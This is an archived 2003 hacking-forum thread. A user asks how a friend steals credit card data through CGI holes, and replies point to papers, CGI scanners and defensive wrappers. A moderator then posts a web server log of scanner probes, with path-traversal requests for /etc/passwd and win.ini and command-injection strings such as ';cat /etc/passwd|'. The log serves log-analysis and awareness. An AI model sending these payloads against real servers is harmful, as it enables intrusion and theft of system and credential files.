View previous topic :: View next topic |
Author |
Message |
mimino Just Arrived
Joined: 06 Apr 2003 Posts: 0
|
Posted: Tue Apr 08, 2003 7:48 pm Post subject: using CGI vulnerabilities... |
|
|
Hi , one of my friends all night long is doing something in inet , to my question he replies that he's hacking some web databases and getting the 100-Megs! of cc-s(credit cards)...I know that he's doing that using CGI vulnerabilities and exploits but he don't tell me how ...if anybody can describe the process of using CGI vulnerabilities like ShaolinTiger did about the proxies .....what programs to use ...from what sites.....I think it will be very interesting for all of us ......
|
|
Back to top |
|
|
Rottz Just Arrived
Joined: 29 Mar 2003 Posts: 3 Location: East Coast, USA
|
Posted: Tue Apr 08, 2003 9:03 pm Post subject: Re: using CGI vulnerabilities... |
|
|
mimino wrote: |
Hi , one of my friends all night long is doing something in inet , to my question he replies that he's hacking some web databases and getting the 100-Megs! of cc-s(credit cards)...I know that he's doing that using CGI vulnerabilities and exploits but he don't tell me how ...if anybody can describe the process of using CGI vulnerabilities like ShaolinTiger did about the proxies .....what programs to use ...from what sites.....I think it will be very interesting for all of us ...... |
Well to start with, phrack has a good paper on CGI Security Holes which will give you basic knowledge of what CGI scripts are and how they are vulnerable to abuse and attacks.
Then you'd use a program called a CGI scanner to scan for thousands of known web application holes like with Nikto or Whisker which of course are educational tools
If you want to protect yourself from CGI attacks, you would use a CGI wrapper that would prevent attacks against your scripts before they ever reach them.
Also learning how to write secure CGI scripts and basic web security is always a good thing.
Knowledge is power, don't abuse it.
Last edited by Rottz on Fri Apr 11, 2003 10:48 pm; edited 1 time in total |
|
Back to top |
|
|
ShaolinTiger Forum Fanatic
Joined: 18 Apr 2002 Posts: 16777215 Location: Kuala Lumpur, Malaysia
|
Posted: Tue Apr 08, 2003 9:04 pm Post subject: Re: using CGI vulnerabilities... |
|
|
Rottz wrote: |
Well to start with, phrack has a good paper on CGI Security Holes which will give you basic knowledge of what CGI scripts are and how they are vulnerable to abuse and attacks.
Then you'd use a program called a CGI scanner to scan for thousands of known web application holes like with Nikto or Whisker which of course are educational tools
If you want to protect yourself from CGI attacks, you would use a CGI wrapper that would prevent attacks against your scripts before they ever reach them.
Also learning how to write secure CGI scripts and basic web security is always a good thing.
Knowledge is power, don't abuse it. |
Excellent post Rottz.
Welcome aboard, hope to see more from you.
We need more people with a clue around here
|
|
Back to top |
|
|
Rottz Just Arrived
Joined: 29 Mar 2003 Posts: 3 Location: East Coast, USA
|
Posted: Tue Apr 08, 2003 9:27 pm Post subject: Re: using CGI vulnerabilities... |
|
|
ShaolinTiger wrote: |
Excellent post Rottz.
Welcome aboard, hope to see more from you.
We need more people with a clue around here |
Yea, I've been lurking around here for awhile. I tried to start my own BB but its hard to start and get people active, and you've seem to already done a very good job and have almost all the bases covered well, so I guess I'll just jump aboard, no point in redoing what is already done well.
Not sure how much of a "clue" I have, but I know where to get one.
Bow down to the ol mighty Google!
Last edited by Rottz on Fri Apr 11, 2003 10:49 pm; edited 1 time in total |
|
Back to top |
|
|
flw Forum Fanatic
Joined: 27 May 2002 Posts: 16777215 Location: U.S.A.
|
Posted: Tue Apr 08, 2003 9:33 pm Post subject: |
|
|
Rottz, nice depth in your post.
|
|
Back to top |
|
|
delete852 Just Arrived
Joined: 19 Nov 2002 Posts: 4 Location: Washington DC
|
Posted: Tue Apr 08, 2003 9:35 pm Post subject: |
|
|
google and techtutorials.com I love that site.
Anyway welcome aboard.
|
|
Back to top |
|
|
Guest
|
Posted: Tue Apr 08, 2003 10:18 pm Post subject: Re: using CGI vulnerabilities... |
|
|
Rottz wrote: |
ShaolinTiger wrote: |
Excellent post Rottz. |
Not sure how much of a "clue" I have, but I know where to get one.
Bow down to the ol mighty Google! |
Wazzzaaa Rottz Yea, all bow to the allmighty google. btw, found a nice paper about google and how you can use it for your pentests
http://www.digivill.net/~mowse/code/mowse-googleknowledge.pdf
|
|
Back to top |
|
|
ThePsyko SF Mod
Joined: 17 Oct 2002 Posts: 16777178 Location: California
|
Posted: Wed Apr 09, 2003 1:45 am Post subject: |
|
|
I haven't bothered to fingerprint this particular cgi scanner yet, but I found the following cgi scan in my logs last week (ip and dates removed) - it's always interesting to see what the skidiots are scanning for - I'd be willing to bet they wouldn't be able to exploit a single one of these without a tool
"GET ///server-info HTTP/1.0" 404 -
"GET ///server-status HTTP/1.0" 404 -
"HEAD /site/eg/ HTTP/1.0" 404 -
"HEAD /doc/ HTTP/1.0" 404 -
"HEAD /~nobody/ HTTP/1.0" 404 -
"GET ///manual/ HTTP/1.0" 404 -
"GET ///php/php.exe?c:\\boot.ini HTTP/1.0" 404 -
"HEAD /code/ HTTP/1.0" 404 -
"GET /cgi-bin/faqmanager.cgi?toc=/etc/passwd%00 HTTP/1.0" 404 -
"GET /cgi-bin/test-cgi.bat?|ver HTTP/1.0" 404 -
"HEAD /error/ HTTP/1.0" 404 -
"GET /cgi-bin/ad.cgi HTTP/1.0" 404 -
"GET /cgi-bin/aglimpse HTTP/1.0" 404 -
"GET /cgi-bin/AnyForm2 HTTP/1.0" 404 -
"GET /cgi-bin/bbs_forum.cgi HTTP/1.0" 404 -
"GET /cgi-bin/bsguest.cgi HTTP/1.0" 404 -
"GET /cgi-bin/bslist.cgi HTTP/1.0" 404 -
"GET /cgi-bin/campas HTTP/1.0" 404 -
"GET //carbo.dll HTTP/1.0" 404 -
"GET /cgi-bin/count.cgi HTTP/1.0" 404 -
"GET /cgi-bin/cgforum.cgi HTTP/1.0" 404 -
"GET /cgi-bin/faxsurvey HTTP/1.0" 404 -
"GET /cgi-bin/gbook.cgi HTTP/1.0" 404 -
"GET /cgi-bin/htsearch HTTP/1.0" 404 -
"GET /cgi-bin/htmlscript HTTP/1.0" 404 -
"GET /cgi-bin/jj HTTP/1.0" 404 -
"HEAD /technote/ HTTP/1.0" 404 -
"GET /cgi-bin/mmstdod.cgi HTTP/1.0" 404 -
"GET /cgi-bin/newdesk HTTP/1.0" 404 -
"GET /cgi-bin/register.cgi HTTP/1.0" 404 -
"GET /cgi-bin/simplestguest.cgi HTTP/1.0" 404 -
"GET /cgi-bin/statusconfig.pl HTTP/1.0" 404 -
"HEAD /iisadmpwd/ HTTP/1.0" 404 -
"GET /cgi-bin/webgais HTTP/1.0" 404 -
"GET /cgi-bin/perl.exe HTTP/1.0" 404 -
"HEAD /cgi-dos/ HTTP/1.0" 404 -
"HEAD /scripts/ HTTP/1.0" 404 -
"GET /cgi-bin/infosrch.cgi HTTP/1.0" 404 -
"GET /cgi-bin/rguest.exe HTTP/1.0" 404 -
"GET /cgi-bin/ezshopper2/loadpage.cgi HTTP/1.0" 404 -
"HEAD /Admin_files/ HTTP/1.0" 404 -
"HEAD /cgi-bin/a1stats/ HTTP/1.0" 404 -
"GET //quote.html?filename=../../../../../../../../../../../../../../../../etc/passwd&path_to_font_file=ariali.ttf HTTP/1.0" 404 -
"GET /cgi-bin/cal_make.pl?p0=../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 -
"GET /cgi-bin/dcboard.cgi HTTP/1.0" 404 -
"GET /cgi-bin/nph-maillist.pl HTTP/1.0" 404 -
"GET /cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1 HTTP/1.0" 404 -
"GET /cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd HTTP/1.0" 404 -
"HEAD /cgi-bin/ikonboard/ HTTP/1.0" 404 -
"HEAD /foldoc/ HTTP/1.0" 404 -
"HEAD /cgi-bin/adcycle/ HTTP/1.0" 404 -
"GET /cgi-bin/store.cgi?StartID=../etc/passwd%00.html HTTP/1.0" 404 -
"GET /cgi-bin/bbs_forum.cgi HTTP/1.0" 404 -
"GET /cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../etc/passwd HTTP/1.0" 404 -
"GET /cgi-bin/hsx.cgi?show=../../../../../../etc/passwd%00 HTTP/1.0" 404 - "GET /cgi-bin/mailnews.cgi HTTP/1.0" 404 -
"GET /cgi-bin/newsdesk.cgi HTTP/1.0" 404 -
"GET /cgi-bin/pals-cgi HTTP/1.0" 404 -
"HEAD /ROADS/ HTTP/1.0" 404 -
"GET /cgi-bin/sendtemp.pl?templ=../../etc/passwd HTTP/1.0" 404 -
"HEAD /way-board/ HTTP/1.0" 404 -
"GET /cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/passwd HTTP/1.0" 404 -
"GET /cgi-bin/DCShop/Orders/orders.txt HTTP/1.0" 404 -
"GET /cgi-bin/a1disp3.cgi?/../../../../../../etc/passwd HTTP/1.0" 404 -
"GET /cgi-bin/get32.exe HTTP/1.0" 404 -
"GET /cgi-bin/auktion.cgi?menue=../../../../../../../../../etc/passwd HTTP/1.0" 404 -
"GET /cgi-bin/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2Fetc HTTP/1.0" 404 -
"GET /cgi-bin/eshop.pl?seite=;cat%20/etc/passwd| HTTP/1.0" 404 -
"GET /cgi-bin/zml.cgi?file=../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 -
"GET /cgi-bin/story.pl?next=../../../etc/passwd%00 HTTP/1.0" 404 -
"GET //ftp.pl?dir=../../../../../../ HTTP/1.0" 404 -
"GET /cgi-bin/publisher/search.cgi?dir=jobs&template=;cat+/etc/passwd|&output_number=10 HTTP/1.0" 404 -
"HEAD /cowsconf/ HTTP/1.0" 404 -
"HEAD /cgi-bin/cowsconf/ HTTP/1.0" 404 -
"GET /cgi-bin/faqmanager.cgi?toc=/etc/passwd%00 HTTP/1.0" 404 -
"HEAD /cg-bin/ HTTP/1.0" 404 -
"GET /cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd HTTP/1.0" 404 - "GET /cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd HTTP/1.0" 404 -
"GET /cgi-bin/directory.php?dir=%3Bmore%20/etc/passwd HTTP/1.0" 404 -
"GET /cgi-bin/mrtg.cgi?cfg=/../../../../../../../../../winnt/win.ini HTTP/1.0" 404 -
"HEAD /examples/ HTTP/1.0" 404 -
"HEAD /perl/ HTTP/1.0" 404 -
|
|
Back to top |
|
|
|